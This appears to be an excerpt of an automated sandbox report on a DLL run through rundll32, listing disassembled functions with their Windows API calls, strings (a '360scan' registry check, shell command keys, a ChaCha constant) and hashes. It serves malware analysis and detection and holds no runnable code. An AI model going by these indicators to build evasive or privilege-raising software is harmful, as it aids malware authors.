                                                                                                  • API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2775880128-0
                                                                                                  • Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                                                  • Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
                                                                                                  • Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                                                  • Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180049050 Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CloseCurrentErrorHandleLastOpenToken$AdjustLookupPrivilegePrivilegesValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 2007143780-0
                                                                                                  • Opcode ID: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                                                  • Instruction ID: d46f0c18e1a39d64aeb05f722a7361000aff992e322ccff9c5dcc36b437ee35a
                                                                                                  • Opcode Fuzzy Hash: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                                                  • Instruction Fuzzy Hash: 2E218032604B4982EB919F61E8583DA63A1FB8CBD5F458035FA9E47B64DF3CC6498B04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800220D8 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 878COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr
                                                                                                  • String ID: \Command$\command$\ddeexec$ifexec$shell$shell\$topic
                                                                                                  • API String ID: 1497570035-2908898620
                                                                                                  • Opcode ID: 12b78799499caf5717bc95cbc03fbabe0b66143b482f3ac1f85879ba428f6373
                                                                                                  • Instruction ID: 575a53dd2e263c1487cf240052cfc12f8aaf5d66da5f39f1f5c7e3cc686b1930
                                                                                                  • Opcode Fuzzy Hash: 12b78799499caf5717bc95cbc03fbabe0b66143b482f3ac1f85879ba428f6373
                                                                                                  • Instruction Fuzzy Hash: F1829472601E4996DB51DF69C8403DE3360FB89BF8F449312AA2D576E5EF78CA89C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180017FE8 Relevance: 13.8, APIs: 9, Instructions: 322COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1944083165-0
                                                                                                  • Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                                                  • Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
                                                                                                  • Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                                                  • Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800576DC Relevance: 12.3, APIs: 8, Instructions: 324COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$From$Pointmemset$??3@MetricsMonitorRectSystem$AncestorDesktopForegroundVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 1557469473-0
                                                                                                  • Opcode ID: 2c64cf9b5a157c200c764c964481ce26847904e65417e42ec88cbcbf6be6bf38
                                                                                                  • Instruction ID: 69adae8c6d1c9aa0e7a060adc37d123b0b6968a36546a0207d70169ef7657c18
                                                                                                  • Opcode Fuzzy Hash: 2c64cf9b5a157c200c764c964481ce26847904e65417e42ec88cbcbf6be6bf38
                                                                                                  • Instruction Fuzzy Hash: 8AD1A3727142488AE7A2CF21A4407EE77A1F78C7C8F548015FA4A67A5ADF3AD649DF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004B780 Relevance: 12.1, APIs: 8, Instructions: 70processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandlememset$ProcessProcess32_wcsicmp$CreateFileFirstModuleNameNextOpenSessionSnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 2365564757-0
                                                                                                  • Opcode ID: b577c6a2819bdb23608ddb003caa5f79ee9fd76a9e86d5510c2c30720fbc3c0c
                                                                                                  • Instruction ID: e435f450c34eaea3765f7d51f7fffc8566e0198940063861de715dcd391ad09e
                                                                                                  • Opcode Fuzzy Hash: b577c6a2819bdb23608ddb003caa5f79ee9fd76a9e86d5510c2c30720fbc3c0c
                                                                                                  • Instruction Fuzzy Hash: 19316631614A4881EBE59F25E89479973A4F788BE4F45C228F96A43694DF3CC70DCB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006A994 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 339COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
                                                                                                  • String ID: INIT
                                                                                                  • API String ID: 2772675779-4041279936
                                                                                                  • Opcode ID: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                                                  • Instruction ID: 738f7e56dffb12879fa424a41098a8b7db62e01a67729e30f645ff56db629163
                                                                                                  • Opcode Fuzzy Hash: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                                                  • Instruction Fuzzy Hash: 31E192727043588BF7A6EB6598507EA77A6F70D7C8F54C029AE5A43B86DF34C608CB10
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005912C Relevance: 10.7, APIs: 7, Instructions: 202COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DevicesDisplayEnum
                                                                                                  • String ID:
                                                                                                  • API String ID: 2856225746-0
                                                                                                  • Opcode ID: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
                                                                                                  • Instruction ID: 90789e0161200a82d414c2e2bf23b1b10d1e56c07e73b18e3e2605f8b4aac2a4
                                                                                                  • Opcode Fuzzy Hash: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
                                                                                                  • Instruction Fuzzy Hash: EA918C32A04A8892E7A2CF75C5053ED6761F7987C8F459202EF8D2769ADF75D78AC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010B58 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValuememmove
                                                                                                  • String ID: 360scan
                                                                                                  • API String ID: 1121107697-2450673717
                                                                                                  • Opcode ID: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                                                  • Instruction ID: 8412be06b917c2556790a81d519247f335b1f81f587c3bd72331bc97ccab05af
                                                                                                  • Opcode Fuzzy Hash: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                                                  • Instruction Fuzzy Hash: B551F336700A4889FBA6CBB5E8107ED3760BB487E8F548215EEA917B95DF74C649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018008023C Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionThrow$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3542664073-0
                                                                                                  • Opcode ID: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                                                  • Instruction ID: f77bb453ddad34bb426a0367fc3509630a9405fc871705a0e6efaa82900c553f
                                                                                                  • Opcode Fuzzy Hash: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                                                  • Instruction Fuzzy Hash: 35216A72B00A88C9E75DFE33B8423EB6212ABD87C0F18D435BA594B69BDE25C5168740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018007B2D0 Relevance: 9.3, APIs: 6, Instructions: 338COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: 7bb71522fe66fe911610681dfbd425f92e509f40c66d32b22c79924d92f1257a
                                                                                                  • Instruction ID: 88002c78fa737218ab7c06d54794bbebd81bd896c6f550827f0a310b477ef9b6
                                                                                                  • Opcode Fuzzy Hash: 7bb71522fe66fe911610681dfbd425f92e509f40c66d32b22c79924d92f1257a
                                                                                                  • Instruction Fuzzy Hash: 6BD1B472604B8C81EBE69F25D4413B967D0FB49BA8F148211EE68837D5DF7ECA99C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180066C3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                  • API String ID: 1848478996-631824599
                                                                                                  • Opcode ID: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                                                  • Instruction ID: 5420fd47393a03a9017ccb442b178d5ad27f9d1acba3036b184651f5d30fce96
                                                                                                  • Opcode Fuzzy Hash: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                                                  • Instruction Fuzzy Hash: FC117032710B4997F7869B22EE453E932A1FB58395F50C125E75982AA0EF3CD67CC710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180082A18 Relevance: 7.6, APIs: 6, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionThrow
                                                                                                  • String ID:
                                                                                                  • API String ID: 432778473-0
                                                                                                  • Opcode ID: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                                                  • Instruction ID: 0cc55a271704fcaf4879220f63c9cc24c35a4ef39e1216f676686ee34d186413
                                                                                                  • Opcode Fuzzy Hash: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                                                  • Instruction Fuzzy Hash: CE118471714A88C9E75EFE33A8027EB5312ABDC7C0F14D434B9894B65BCF25C6164300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180075480 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID: gfffffff
                                                                                                  • API String ID: 2918714741-1523873471
                                                                                                  • Opcode ID: 30e2b441770a82029b250d624d8f23b5d85c0f08b2924f70b9e89734be1034e0
                                                                                                  • Instruction ID: e884fe3883432bf4560e9dda0f15de4f5fdaecbd06aef68c98bbca16ed2f166a
                                                                                                  • Opcode Fuzzy Hash: 30e2b441770a82029b250d624d8f23b5d85c0f08b2924f70b9e89734be1034e0
                                                                                                  • Instruction Fuzzy Hash: 889135737097C986EBA68B25E0103ED7790A769BC5F448022EE88477C1EE6EC249C701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180062954 Relevance: 5.4, Strings: 4, Instructions: 411COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2-by$expa$nd 3$te k
                                                                                                  • API String ID: 0-3581043453
                                                                                                  • Opcode ID: 7d0663e54f1b2395dbcc08c568551d6f36a52211b7c4844561c2c131177ac7f0
                                                                                                  • Instruction ID: c297e74e0c180ef42d2354436ccfa45db5c13d40a8cb4edea60e41e24322b4e0
                                                                                                  • Opcode Fuzzy Hash: 7d0663e54f1b2395dbcc08c568551d6f36a52211b7c4844561c2c131177ac7f0
                                                                                                  • Instruction Fuzzy Hash: A0F1E5631292D48EC3A2DB7C984465E7FE0E39754AB28929AD7D5D3603D22CC21FCB31
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800630CC Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2-by$expa$nd 3$te k
                                                                                                  • API String ID: 0-3581043453
                                                                                                  • Opcode ID: ec48b44b1c0248daf60d59e01e3f777e8872dcfd8e4671830303b2a941347eb0
                                                                                                  • Instruction ID: 6d189d3b1ce4af506612ec0345e062f7795090044f7a03dc3e29e2cc5fe06a45
                                                                                                  • Opcode Fuzzy Hash: ec48b44b1c0248daf60d59e01e3f777e8872dcfd8e4671830303b2a941347eb0
                                                                                                  • Instruction Fuzzy Hash: CEC1C6730182D44FE392CB3C9C9565EBFE0E346687B68A166E7D2C2511E128C66ACF71
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180062600 Relevance: 5.2, APIs: 4, Instructions: 248COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1288253900-0
                                                                                                  • Opcode ID: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
                                                                                                  • Instruction ID: 53b279b989bf8eb66429a88fea8492b1387e1814281b1786c9cbc4725fb6e079
                                                                                                  • Opcode Fuzzy Hash: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
